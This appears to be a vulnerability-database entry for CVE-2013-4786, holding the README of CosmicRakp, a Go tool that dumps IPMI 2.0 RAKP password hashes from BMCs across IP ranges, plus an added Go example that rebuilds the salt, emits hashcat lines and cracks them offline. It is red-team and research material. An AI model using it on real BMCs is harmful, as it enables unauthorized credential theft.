
CVE-2013-4786 PoC: Intelligent Platform Management Interface trust management vulnerability

Associated vulnerability
Title: Intelligent Platform Management Interface trust management vulnerability (CVE-2013-4786)
Description: The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication, which allows remote attackers to obtain password hashes and conduct offline password guessing attacks by obtaining the HMAC from a RAKP message 2 response from a BMC.
PoC description: CVE-2013-4786 Go exploitation tool
Readme
# CosmicRakp

![Thanos Image](./thanos.jpg)

## Table of Contents

- [Introduction](#introduction)
- [CVE-2013-4786](#cve-2013-4786)
- [Installation](#installation)
- [Usage](#usage)
- [Credits](#credits)
- [License](#license)

## Introduction

CosmicRakp is a tool written in Go that lets red teamers and penetration testers dump IPMI 2.0 RAKP password hashes from BMCs, either across an IP range or from a target list. This project aims to be efficient, fast, and easy to use.

## CVE-2013-4786

This tool exploits the vulnerability detailed in CVE-2013-4786, which allows unauthenticated remote users to retrieve salted password hashes from IPMI 2.0 devices via the RAKP (RMCP+ Authenticated Key-Exchange Protocol) exchange. The client opens an RMCP+ session and sends RAKP message 1, which carries a random nonce and the username it wants to log in as. The BMC answers with RAKP message 2, which contains an HMAC (HMAC-SHA1 when the client requests the RAKP-HMAC-SHA1 authentication algorithm, as the Metasploit module this tool follows does) over the two session IDs, both nonces, the BMC GUID, the requested privilege level and the username, keyed with that user's password. Because the BMC sends this value before the client has proven anything, one unauthenticated exchange per username yields a salted hash that can be cracked offline, with no further traffic to the BMC and therefore no lockout. No 'None' cipher suite is involved: the weakness is in the RAKP design itself, so it affects any BMC that implements IPMI 2.0 as specified. The attack does require a valid username, which is why the tool iterates over a username list; a BMC that answers an unknown name with an RMCP+ error status also reveals which accounts exist.
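The following Go program is an added example, not code from CosmicRakp or the Metasploit module. It reconstructs the offline half of the attack described above: it assembles the data the BMC authenticates in RAKP message 2 (the fields and their order are taken from the IPMI 2.0 RAKP message layout), recomputes the HMAC-SHA1 for candidate passwords, and compares each against a captured value. The type and function names (`RakpSession`, `RakpHMAC`, `Crack`, `Hashcat7300`) are this example's own, the RAKP-HMAC-SHA1 algorithm is assumed, and every byte in `SampleSession` is constructed rather than captured from a real BMC.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// RakpSession collects the values a client knows after the RMCP+ Open
// Session response and RAKP message 2. Field sizes are those of the
// IPMI 2.0 RAKP messages; the names follow the specification's notation.
type RakpSession struct {
	ConsoleSessionID [4]byte  // SIDm: chosen by the client (remote console)
	BMCSessionID     [4]byte  // SIDc: assigned by the BMC in the Open Session response
	ConsoleRandom    [16]byte // Rm: client nonce sent in RAKP message 1
	BMCRandom        [16]byte // Rc: BMC nonce returned in RAKP message 2
	BMCGUID          [16]byte // GUIDc: BMC GUID returned in RAKP message 2
	Role             byte     // RoleM: requested maximum privilege level (0x04 = ADMINISTRATOR)
	Username         string   // UNameM: the account named in RAKP message 1
}

// Salt returns the data the BMC authenticates in RAKP message 2:
// SIDm || SIDc || Rm || Rc || GUIDc || RoleM || ULengthM || UNameM.
// Everything in it is either chosen by the client or sent in the clear,
// which is what turns the HMAC into a crackable salted hash.
func (s RakpSession) Salt() []byte {
	var b bytes.Buffer
	b.Write(s.ConsoleSessionID[:])
	b.Write(s.BMCSessionID[:])
	b.Write(s.ConsoleRandom[:])
	b.Write(s.BMCRandom[:])
	b.Write(s.BMCGUID[:])
	b.WriteByte(s.Role)
	b.WriteByte(byte(len(s.Username)))
	b.WriteString(s.Username)
	return b.Bytes()
}

// RakpHMAC reproduces the Key Exchange Authentication Code a BMC using
// RAKP-HMAC-SHA1 places in RAKP message 2: HMAC-SHA1 keyed with the user's
// password. HMAC zero-pads short keys, so a null-padded 16- or 20-byte
// stored password and the raw password string give the same result.
func RakpHMAC(s RakpSession, password string) []byte {
	m := hmac.New(sha1.New, []byte(password))
	m.Write(s.Salt())
	return m.Sum(nil)
}

// Hashcat7300 renders a capture as "salt_hex:hmac_hex", the input layout of
// hashcat mode 7300 (IPMI2 RAKP HMAC-SHA1).
func Hashcat7300(s RakpSession, mac []byte) string {
	return hex.EncodeToString(s.Salt()) + ":" + hex.EncodeToString(mac)
}

// Crack is the offline guessing step: recompute the HMAC for each candidate
// and compare it with the value read from RAKP message 2. The BMC is never
// contacted again, so account lockout never triggers.
func Crack(s RakpSession, captured []byte, wordlist []string) (string, bool) {
	for _, pw := range wordlist {
		if hmac.Equal(RakpHMAC(s, pw), captured) {
			return pw, true
		}
	}
	return "", false
}

// SampleSession builds a constructed session. None of these bytes came from
// a real BMC; they only stand in for values parsed off the wire.
func SampleSession() RakpSession {
	s := RakpSession{Role: 0x04, Username: "ADMIN"}
	copy(s.ConsoleSessionID[:], []byte{0xa4, 0xa3, 0xa2, 0xa0})
	copy(s.BMCSessionID[:], []byte{0x02, 0x00, 0x00, 0x00})
	for i := 0; i < 16; i++ {
		s.ConsoleRandom[i] = byte(i)
		s.BMCRandom[i] = byte(0x10 + i)
		s.BMCGUID[i] = byte(0x20 + i)
	}
	return s
}

func main() {
	s := SampleSession()
	// Stand-in for the HMAC a BMC would return for a user whose password is "Passw0rd".
	captured := RakpHMAC(s, "Passw0rd")
	fmt.Println(Hashcat7300(s, captured))
	pw, ok := Crack(s, captured, []string{"admin", "ADMIN", "changeme", "Passw0rd"})
	fmt.Println(pw, ok)
}
```

The salt changes with every session because both nonces and the BMC session ID differ, so a wordlist must be run once per capture; that is also why each dumped hash carries its own salt in the hashcat line. A real capture only supplies the fields, so the `captured` value here is computed from the known password purely to make the example self-contained.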

## Installation

```bash
./build.sh
```

## Usage

```text
❯ ./cosmicrakp -h
Usage of ./cosmicrakp:
  -debug
    	enable debug mode
  -max-attempts int
    	maximum number of attempts to open a session (default 3)
  -mode string
    	mode of operation: 'range' or 'file' (default "range")
  -output string
    	File to store output results (default "output.txt")
  -range string
    	IP range for 'range' mode
  -retry-delay duration
    	time to wait between retries (in seconds) (default 2s)
  -targets string
    	target file for 'file' mode
  -threads int
    	number of threads for concurrent execution (default 4)
  -usernames string
    	File containing usernames to test (default "users.txt")
```


### Credits

This project is inspired by and pays homage to one of the original (if not the original) proofs of concept for exploiting CVE-2013-4786. The PoC was developed by Dan Farmer and is part of the Metasploit Framework as the `ipmi_dumphashes` auxiliary scanner module. You can find the original code [here](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb).

### License

This project uses the MIT license.
File Snapshot

[4.0K] /data/pocs/ebd2ef133a56ba8f68fe74537d0a1d70362326af
├── [  65] build.sh
├── [4.0K] ipmi
│   └── [ 11K] ipmi.go
├── [1.0K] LICENSE
├── [7.6K] main.go
├── [1.9K] README.md
├── [194K] thanos.jpg
├── [  50] users.txt
└── [4.0K] util
    └── [2.2K] util.go

2 directories, 8 files